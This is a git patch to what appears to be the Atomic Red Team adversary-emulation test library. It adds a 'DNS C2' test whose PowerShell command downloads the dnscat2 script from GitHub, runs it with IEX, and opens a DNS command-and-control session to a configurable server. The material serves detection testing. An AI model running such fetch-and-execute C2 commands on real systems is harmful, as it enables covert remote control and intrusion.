From c9bf800a2972fe7b4f4a46d0bb91e94caa8691ce Mon Sep 17 00:00:00 2001
From: MrOrOneEquals1 <dfr1of8@gmail.com>
Date: Thu, 6 Feb 2020 09:00:15 -0700
Subject: [PATCH] T1071 - adding DNS C2 (#825)

* DNS C2

* DNS C2 - Fix Typos

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1071/T1071.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)

diff --git a/atomics/T1071/T1071.yaml b/atomics/T1071/T1071.yaml
index 62d8c643..f5d36239 100644
--- a/atomics/T1071/T1071.yaml
+++ b/atomics/T1071/T1071.yaml
@@ -160,3 +160,28 @@ atomic_tests:
     command: |
       Set-Location $PathToAtomicsFolder
       .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
+
+- name: DNS C2
+  description: |
+    This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
+    The following blogs have more information.
+    https://github.com/iagox86/dnscat2
+    https://github.com/lukebaggett/dnscat2-powershell
+
+  supported_platforms:
+    - windows
+  input_arguments:
+    domain:
+      description: Domain Name configured to use DNS Server where your C2 listener is running
+      type: string
+      default: example.com
+    server_ip:
+      description: IP address of DNS server where your C2 listener is running
+      type: string
+      default: 127.0.0.1
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
+      Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
\ No newline at end of file